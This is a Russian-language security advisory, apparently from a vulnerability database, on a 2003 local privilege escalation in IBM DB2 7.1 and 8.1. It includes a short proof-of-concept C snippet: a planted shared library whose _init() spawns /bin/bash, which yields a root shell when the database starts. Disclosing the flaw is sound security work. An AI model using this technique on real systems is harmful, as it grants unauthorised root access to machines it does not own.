Локальный пользователь с bin привилегиями может получить root привилегии в IBM DB2

Дата публикации:
08.08.2003
Всего просмотров:
692
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Уязвимость обнаружена в базе данных IBM DB2. Локальный пользователь с ‘bin’ привилегиями может получить root привилегии на системе.

Локальный пользователь с ‘bin’ привилегиями пользователь может сконструировать ‘so’ библиотеку в lib каталоге базы данных ('/usr/IBMdb2/V7.1/lib' в IBM DB2 7.1 и '/opt/IBM/db2/V8.1/lib' в IBM DB2 8.1). Пример:

#include <stdio.h>
#include <string.h>

_init() {
   printf("en el _init()\n");
   printf("Con PID=%i y EUID=%i",getpid(),getuid());
   system("/bin/bash");
   printf("Saliendo del Init()\n");
Затем, когда будет запущенна база данных, произвольный код в библиотеке будет выполнен с root привилегиями.

Уязвимость обнаружена в IBM DB2 7.1, 8.1 и возможно другие версии

Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Slight privilege elevation from bin to root in IBM DB2 7.1 - 8.1

или введите имя

CAPTCHA